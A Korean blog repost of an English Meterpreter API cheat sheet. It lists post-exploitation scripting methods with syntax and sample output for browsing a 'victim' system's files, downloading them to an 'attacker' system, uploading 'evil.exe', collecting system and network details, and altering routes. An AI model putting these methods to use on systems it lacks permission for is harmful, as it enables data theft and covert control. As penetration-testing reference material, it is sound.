'[Metasploit]Meterpreter API Cheat Sheet'에 해당되는 글 1건

  1. 2012.07.26 [Metasploit]Meterpreter API Cheat Sheet

This page contains meterpreter methods with their syntax and output. The aim was to provide a quick reference for the meterpreter script developer. 

Rather than checking the code of already existing meterpreter scripts and searching for the relevant method, this page can be like a one stop shop.

Hope this will help newbies and enthusiast like me who want to start writing their own meterpreter scripts. 

P.S : Not all the methods are covered as this is all i can do in 3 hours. More to update soon :)

Get all the files/folders in a directory

Syntax: client.fs.dir.entries

Output: ["AUTOEXEC.BAT", "boot.ini", "CONFIG.SYS", "Documents and Settings"]

Comment: By default it will get the files and directories of present working directory.

Syntax: client.fs.dir.entries("c:\\")

Output: ["sample_file.txt","dummy_directory","myfile.exe"] 

Comment: This will get the files and directories of c drive.

Get all the files/folders in a directory along with extra information

Syntax: client.fs.dir.entries_with_info

Output: [{"FileName"=>".", "FilePath"=>"c:\\........ "st_atime"=>0, "st_mtime"=>1329581528}>}]

Comment: By default it will get the files and directories of present working directory.

Syntax: client.fs.dir.entries_with_info("c:\\")

Output: [{"FileName"=>".", "FilePath"=>"c:\\........ "st_atime"=>0, "st_mtime"=>1329581528}>}]

Comment: This will get the files and directories of c drive.

Change the directory

Syntax: client.fs.dir.chdir("c:\\")

Output: 0

Comment: This will change the present working directory to c drive.

Make directory

Syntax: client.fs.dir.mkdir("c:\\oldman")

Output: 0

Comment: This will make a directory named "oldman" in c drive.

Get current working directory

Syntax: client.fs.dir.pwd

Output: "c:\\oldmanlab"

Comment: This will give the current working directory name

Syntax: client.fs.dir.getwd

Output: "c:\\oldmanlab"

Comment: This will give the current working directory name

Delete a directory

Syntax: client.fs.dir.delete("c:\\oldman")

Output: 0

Comment: This will delete the specified directory only if empty.

Syntax: client.fs.dir.rmdir("c:\\oldman")

Output: 0

Comment: This will delete the specified directory only if empty.

Syntax: client.fs.dir.unlink("c:\\oldman")

Output: 0

Comment: This will delete the specified directory only if empty.

Download contents of a target directory

Syntax: client.fs.dir.download("/root/oldmanlab/","c:\\oldman")

Output: [".", "..", "firefox.lnk", "my_file.txt"]

Comment: This will download all the file inside oldman directory of victim and will save inside the oldmanlab directory of an attacker system.

Upload contents of a local directory to victim system

Syntax: client.fs.dir.upload("c:\\oldman","/root/oldmanlab")

Output: [".", "..", "firefox.lnk", "my_file.txt"]

Comment: This will upload all the content inside oldmanlab directory of an attacker to the oldman directory of victim system.

Get the file separator

Syntax: client.fs.file.separator

Output: \\

Comment: This will give the file separator used by the system (\\ for windows, \ for unix.

Search for the specified file

Syntax: client.fs.file.search("c:\\oldman","hacking.txt")

Output: [{"path"=>"c:\\oldman\\lab", "name"=>"hacking.txt", "size"=>4}]

Comment: This will search for hacking.txt in the oldman directory and its subdirectories

Get the basename for the specified file

Syntax: client.fs.file.basename("c:\\oldman\\hacking.txt")

Output: hacking.txt

Comment: This will give the filename of the filepath specified. 

Expand path of the directory

Syntax: client.fs.file.expand_path("%TEMP%")

Output: "C:\\WINDOWS\\TEMP"

Comment: This will give the absolute path of the shortcut specified

Get the md5 of file

Syntax: client.fs.file.md5("c:\\oldman\\file.txt")

Output: "\x12,\x17~Fj\xFEq\xB7?'\x01;f\x7F'"

Comment: This will give the md5 sum of the specified file

Get the sha1 of file

Syntax: client.fs.file.md5("c:\\oldman\\file.txt")

Output: "Q\xD0\b\xFF\xFA\xD8\xF4x7_\xAE\x911\xB4\xE12V\xB8\tw"

Comment: This will give the sha1 of the specified file

Check if specified file exists

Syntax: client.fs.file.exists?("c:\\oldman\\file.txt")

Output: true

Comment: This will return true if file exists else false

Delete specified file

Syntax: client.fs.file.rm("c:\\oldman\\file.txt")

Output: Rex::Post::Meterpreter::Packet type=Response....meta=INT value=0 

Comment: This will return true if file exists else false

Syntax: client.fs.file.unlink("c:\\oldman\\file.txt")

Output: Rex::Post::Meterpreter::Packet type=Response....meta=INT value=0 

Comment: This will return true if file exists else false

Upload file to victims system

Syntax: client.fs.file.upload("c:\\oldman","/root/lab/evil.exe")

Output: ["/root/lab/firefox.lnk"]

Comment: This will upload evil.exe from attackers system to victims oldman directory

Download file from victims system

Syntax: client.fs.file.download("/root/lab/secret.exe","c:\\oldman\\secret.exe")

Output: ["c:\\oldman\\secret.exe"]

Comment: This will download secret.exe from victims system and will save it to attackers root directory

Open a file in read mode and copy the content to some variable

Syntax: file1 = client.fs.file.new("c:\\oldman\\my_file.txt")

              temp = ""

              until file1.eof?

              temp << file_object.read

Output: N.A

Comment: This will copy all the data inside my_file.txt and store it in temp variable

List all the available interface from victims system

Syntax: client.net.config.get_interfaces

Output: [......]

Comment: This will return an array of the first interface available in the victims system along with the details like IP, netmask, mac_address etc

Syntax: client.net.config.get_interfaces[0]

Output: [......]

Comment: This will return an array of the first interface available in the victims system along with the details like IP, netmask, mac_address etc

Get the IP address of specified interface

Syntax: client.net.config.get_interfaces[1].ip


Comment: This will give IP address of the second interface in the list.

List all the routes available in victims system

Syntax: client.net.config.get_routes


Comment: This will return an array of all the routes available in the victims system along with the details like subnet, netmask, gateway

Syntax: client.net.config.get_routes[0]


Comment: This will return an array of the first route available in the victims system along with the details like subnet, netmask, gateway

Add a route in victims system

Syntax: client.net.config.add_route("x.x.x.x","x.x.x.x","x.x.x.x")

Output: true

Comment: This will add route in the victims system. The first parameter is subnet, second is netmask and third is gateway.

Remove specified route from victims system

Syntax: client.net.config.remove_route("x.x.x.x","x.x.x.x","x.x.x.x")

Output: true

Comment: This will remove route from the victims system. The first parameter is subnet, second is netmask and third is gateway.

Get the user id

Syntax: client.sys.config.getuid


Comment: This will give the user id of the victim system. It basically shows our access level.

Get the victims computer name

Syntax: client.sys.config.sysinfo["Computer"]

Output: "WINXP-1337"

Comment: This will give the computer name of the compromised system.

Get the victims operating system name and version

Syntax: client.sys.config.sysinfo["OS"]

Output: "Windows XP (Build 2600, Service Pack 2)."

Comment: This will give the operating system name running on the compromised system.

Get the victims operating system architecture

Syntax: client.sys.config.sysinfo["Architecture"]

Output: "x86"

Comment: This will give the architecture (x86,64-bit)of the operating system running on compromised system.

Get the victims operating system language

Syntax: client.sys.config.sysinfo["System Language"]

Output: "en_US"

Comment: This will give operating system language of the compromised system.

Revert to previous user privileges

Syntax: client.sys.config.revert_to_self

Output: N.A

Comment: Let say if we had change privilege from "NT AUTHORITY\\oldmanlab" to "NT AUTHORITY\\SYSTEM" then revert to self will again change our privileges to "NT AUTHORITY\\oldmanlab" 

출처 - http://oldmanlab.blogspot.kr/p/meterpreter-api-cheat-sheet.html

'공부 > Forensics' 카테고리의 다른 글

[InForensics] 메모리 분석 - 2  (2) 2012.08.12
[InForensics] 메모리 분석 - 1  (0) 2012.08.09
[Forensics]Live Response  (1) 2012.07.25
[Metasploit] Msfpayload  (0) 2012.07.21
[Metasploit]Meterpreter (Reverse exe)  (4) 2012.07.21
Posted by extr